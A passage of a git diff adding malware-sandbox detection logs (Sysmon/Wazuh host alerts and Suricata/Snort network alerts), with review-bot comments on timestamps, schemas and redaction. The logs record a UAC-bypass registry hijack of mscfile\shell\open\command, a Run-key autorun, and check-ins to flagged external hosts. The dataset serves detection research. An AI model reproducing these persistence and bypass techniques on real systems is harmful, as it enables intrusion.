value set:\r\nRuleName: T1042\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:18:16.616\r\nProcessGuid: {df9fc3d3-d118-5ec7-0000-00109ec01100}\r\nProcessId: 6988\r\nImage: C:\\Users\\John Williams\\Downloads\\program2.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001_Classes\\mscfile\\shell\\open\\command\\(Default)\r\nDetails: C:\\Users\\John Williams\\Downloads\\program2.exe\""""},""eventdata"":{""ruleName"":""T1042"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:18:16.616"",""processGuid"":""{df9fc3d3-d118-5ec7-0000-00109ec01100}"",""processId"":""6988"",""image"":""C:\\\\Users\\\\John 
Williams\\\\Downloads\\\\program2.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\program2.exe""}}}",
diff --git a/data/MW_2_NIDS.csv b/data/MW_2_NIDS.csv
new file mode 100644
index 0000000..8b84331
--- /dev/null
+++ b/data/MW_2_NIDS.csv
@@ -0,0 +1,6 @@
+"@timestamp",message,"log.file.path"
+"Apr 4, 2020 @ 14:49:15.594","04/04/2020-14:49:14.333152 [**] [1:2022918:2] ET INFO DYNAMIC_DNS Query to *.duckdns. Domain [**] [Classification: Misc activity] [Priority: 3] {UDP} 172.16.2.2:55333 -> 172.16.2.1:53","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:49:08.590","04/04/2020-14:48:59.973229 [**] [1:2022918:2] ET INFO DYNAMIC_DNS Query to *.duckdns. Domain [**] [Classification: Misc activity] [Priority: 3] {UDP} 172.16.2.2:58191 -> 172.16.2.1:53","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:48:03.584","04/04/2020-14:47:58.048129 [**] [1:2022918:2] ET INFO DYNAMIC_DNS Query to *.duckdns. Domain [**] [Classification: Misc activity] [Priority: 3] {UDP} 172.16.2.2:63783 -> 172.16.2.1:53","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:48:03.584","04/04/2020-14:47:59.050078 [**] [1:2022918:2] ET INFO DYNAMIC_DNS Query to *.duckdns. Domain [**] [Classification: Misc activity] [Priority: 3] {UDP} 172.16.2.2:63783 -> 172.16.2.1:53","/var/log/suricata/fast.log"
+"Apr 4, 2020 @ 14:48:03.583","04/04/2020-14:47:57.258514 [**] [1:2022918:2] ET INFO DYNAMIC_DNS Query to *.duckdns. Domain [**] [Classification: Misc activity] [Priority: 3] {UDP} 172.16.2.2:63783 -> 172.16.2.1:53","/var/log/suricata/fast.log"
diff --git a/data/MW_30_HIDS_3.csv b/data/MW_30_HIDS_3.csv
new file mode 100644
index 0000000..11bc2db
--- /dev/null
+++ b/data/MW_30_HIDS_3.csv
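Review bot: The `timestamp` column in this file is not the event time: the T1088 row is stamped `May 22, 2020 @ 16:04:12.583` while its own Sysmon payload carries `UtcTime: 2020-05-22 13:18:16.616` and `systemTime ... 13:18:16.631941300Z`, so whether that gap is timezone display or ingest delay, joining on `timestamp` against the NIDS capture will mis-order events. I would add a README line (or a derived `event_time` column) stating that `data.win.eventdata.utcTime` / `systemTime` is authoritative and `timestamp` is the Wazuh/Elastic index time. The header here (`...,"full_log","data.win.eventdata.commandLine"`) also differs from the one in data/MW_30_HIDS_3.csv, which adds `targetObject` and `details` and reorders columns, so per-sample files cannot be loaded with one schema; exporting every sample with the same column list would fix that. Finally, the rows carry the lab host identity unredacted (`DESKTOP-HUE026H`, user `John Williams`, SID `S-1-5-21-438079597-2123118846-2669748851-1001`); if this corpus is public, consider pseudonymising those values consistently across all files so the dataset stays joinable without exposing the environment.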
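Review bot: The Suricata `fast.log` rows record only the signature (`ET INFO DYNAMIC_DNS Query to *.duckdns. Domain`) and the 5-tuple `172.16.2.2:<port> -> 172.16.2.1:53`; the queried duckdns hostname, which is the one indicator an analyst would pivot on, is not preserved anywhere in this file. Exporting the matching `eve.json` `dns` records (or at least the alert payload) alongside fast.log would keep it. Two rows also share the export `@timestamp` `Apr 4, 2020 @ 14:48:03.584` while their embedded Suricata times differ (`14:47:58.048129` vs `14:47:59.050078`), so `@timestamp` appears to be the log shipper's read time and the leading timestamp inside `message` should be used for ordering; a README note or a parsed `event_time` column would make that explicit. Note too that this capture is dated Apr 4, 2020 whereas data/MW_2_HIDS_3.csv for the same sample is dated May 22, 2020, so the NIDS and HIDS evidence for MW_2 come from different detonation runs and cannot be correlated on time.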
@@ -0,0 +1,42 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 31, 2020 @ 13:43:39.300",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_ENABLE_HTTP2' checksum changed. +Old md5sum was: '19a84742b6b5ff086df143d980ae4afe' +New md5sum is : '3d5dfdf70489c96988a67b733c998d33' +Old sha1sum was: '059238efcadea262aecd701312fba26b753c1423' +New sha1sum is : 'f73c7d8c6bd7817bd8c59b3473f67f03e39e5811' +", +"May 31, 2020 @ 13:43:38.165",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER' checksum changed. +Old md5sum was: 'd80d1f3cbf8f90f787a0b09282119947' +New md5sum is : '66f9de40f01f43922ce290fd529be6f6' +Old sha1sum was: '387915cc44190d01197354f7b600e1cd7ccffd55' +New sha1sum is : '79b04ee91b68c25665eef548034ab27c28a642da' +", +"May 31, 2020 @ 13:30:17.547",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '1c729912f87f9abbd1574176fc5996f7' +New md5sum is : '370914f65a755a1cbfcf0c873b11feaa' +Old sha1sum was: '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +New sha1sum is : 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +", +"May 31, 2020 @ 13:27:54.122",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. 
+Old md5sum was: '4851a8fa9ed6c37f76f4ef6c0dd6d33e' +New md5sum is : 'c12e8a73095bad27b1cc02a25306e36f' +Old sha1sum was: '96ff488eeb3d9b9ede478b6e2d70a97d2cd5d937' +New sha1sum is : 'a0ff409933dc115dae27ec11fce7bac75925010f' +", +"May 31, 2020 @ 13:27:54.108",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'd81f7e509f5c1a9330ce7886a815c11b' +New md5sum is : '29446b14184e8caf0aea576ee321f0f4' +Old sha1sum was: '032f00848ab7f2fe55a7b63edfa8c5598fbf5268' +New sha1sum is : 'bb6ecadefeba5206120a42a61651b3ea7d9a4bb2' +", +"May 31, 2020 @ 13:26:24.850",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 31, 2020 @ 13:26:15.517",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 31, 2020 @ 13:21:18.146",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:56:35.494 +ProcessGuid: {df9fc3d3-b4fa-5ecf-0000-0010a9aa2d00} +ProcessId: 2776 +Image: C:\Program Files (x86)\SogouSoftware\tmp\ExternalApp.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\SogouSoftwareAutoRun +Details: C:\Program Files (x86)\SogouSoftware\SogouSoftware.exe 
/AutoRun""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SogouSoftwareAutoRun","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:56:35.518723400Z"",""eventRecordID"":""2488"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:56:35.494\r\nProcessGuid: {df9fc3d3-b4fa-5ecf-0000-0010a9aa2d00}\r\nProcessId: 2776\r\nImage: C:\\Program Files (x86)\\SogouSoftware\\tmp\\ExternalApp.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SogouSoftwareAutoRun\r\nDetails: C:\\Program Files (x86)\\SogouSoftware\\SogouSoftware.exe /AutoRun\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:56:35.494"",""processGuid"":""{df9fc3d3-b4fa-5ecf-0000-0010a9aa2d00}"",""processId"":""2776"",""image"":""C:\\\\Program Files (x86)\\\\SogouSoftware\\\\tmp\\\\ExternalApp.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\SogouSoftwareAutoRun"",""details"":""C:\\\\Program Files (x86)\\\\SogouSoftware\\\\SogouSoftware.exe /AutoRun""}}}","C:\\Program Files (x86)\\SogouSoftware\\SogouSoftware.exe /AutoRun" diff --git a/data/MW_30_NIDS.csv b/data/MW_30_NIDS.csv new file mode 100644 index 0000000..730b7ba --- /dev/null +++ b/data/MW_30_NIDS.csv 
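Review bot: The five "Integrity checksum changed." rows at the top of MW_30_HIDS_3.csv look like environment churn rather than sample activity and should be labelled or filtered before being counted as HIDS detections: the FEATURE_USE_WINDOWEDSELECTCONTROL key goes from md5 `1c729912…` to `370914f6…` here, while the preceding file's tail above shows the same key going the opposite way, and MW_31_HIDS_3.csv below reverses this file's FEATURE_WEBOC_ENABLE_HTTP2 and Winlogon hashes. The pattern is consistent with the registry toggling on each snapshot restore, though that cannot be confirmed from the CSV alone. Separately, the `timestamp` column reads May 31 13:21 for the T1060 row while the Sysmon record inside `full_log` says `UtcTime: 2020-05-28 12:56:35`, a three-day gap; the data dictionary should state which of the two is authoritative, since the NIDS rows for the same sample are stamped May 31 13:21–13:26 and correlating on `timestamp` versus `utcTime` yields different results.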
@@ -0,0 +1,73 @@ +"@timestamp",message,"log.file.path" +"May 31, 2020 @ 13:26:49.454","05/31/2020-13:26:42.179597 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:26:49.454","05/31/2020-13:26:42.370565 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:26:49.454","05/31/2020-13:26:42.973119 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:26:49.454","05/31/2020-13:26:43.219921 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:26:49.454","05/31/2020-13:26:43.485568 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:26:49.454","05/31/2020-13:26:43.649905 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:26:49.407","05/31-13:26:40.962535 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:26:49.407","05/31-13:26:42.227432 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network 
Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:26:49.407","05/31-13:26:42.376140 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:26:49.407","05/31-13:26:42.973972 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:26:49.407","05/31-13:26:43.319729 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:26:49.407","05/31-13:26:43.486719 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:54.426","05/31/2020-13:24:53.856516 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:54.357","05/31-13:24:53.366641 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:53.424","05/31/2020-13:24:52.513446 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:53.424","05/31/2020-13:24:52.697039 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly 
Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:53.424","05/31/2020-13:24:52.884089 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:53.424","05/31/2020-13:24:53.087993 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:53.355","05/31-13:24:52.514048 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:53.355","05/31-13:24:52.704253 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:53.355","05/31-13:24:52.905493 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:53.354","05/31-13:24:52.013683 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:52.423","05/31/2020-13:24:51.467147 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:52.423","05/31/2020-13:24:51.646792 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] 
[Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:52.423","05/31/2020-13:24:51.832259 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:52.423","05/31/2020-13:24:52.012868 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:52.353","05/31-13:24:51.101469 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:52.353","05/31-13:24:51.285466 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:52.353","05/31-13:24:51.468059 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:52.353","05/31-13:24:51.647978 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:52.353","05/31-13:24:51.833584 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:51.422","05/31/2020-13:24:50.916836 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin 
[**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:51.422","05/31/2020-13:24:51.100652 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:51.422","05/31/2020-13:24:51.282766 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:51.352","05/31-13:24:47.722449 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:51.352","05/31-13:24:50.917871 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:50.421","05/31/2020-13:24:44.385971 [**] [1:2014726:124] ET POLICY Outdated Flash Version M1 [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50254 -> 113.200.16.208:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:50.421","05/31/2020-13:24:44.390912 [**] [1:2015704:6] ET CURRENT_EVENTS DoSWF Flash Encryption Banner [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} 113.200.16.208:80 -> 172.16.2.2:50254","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:48.350","05/31-13:24:44.062505 [**] [1:2014726:120] ET POLICY Outdated Flash Version M1 [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50254 -> 113.200.16.208:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 
13:23:35.410","05/31/2020-13:23:26.862679 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50189 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:23:35.410","05/31/2020-13:23:27.803291 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50189 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:23:35.410","05/31/2020-13:23:28.019515 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50189 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:23:33.342","05/31-13:21:21.321392 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:23:33.342","05/31-13:23:26.681509 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50189 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:23:33.342","05/31-13:23:27.623394 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50189 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:23:33.342","05/31-13:23:27.839094 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50189 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:30.400","05/31/2020-13:21:26.860932 [**] [1:2822181:6] ETPRO MALWARE Bolek HTTP Checkin [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50132 -> 
123.125.221.6:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:17.209472 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:17.441096 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:16.940514 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:17.651587 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:17.674189 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:17.842692 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50113 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:17.855903 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:18.039604 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 
211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:18.247578 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:28.329","05/31-13:21:18.343434 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50119 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:21:23.356","05/31/2020-13:21:21.881532 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:20.341","05/31/2020-13:21:19.672411 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:19.332","05/31/2020-13:21:18.522096 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50119 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:19.332","05/31/2020-13:21:19.097777 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:19.331","05/31/2020-13:21:18.431421 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:21:18.329","05/31/2020-13:21:17.392371 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program 
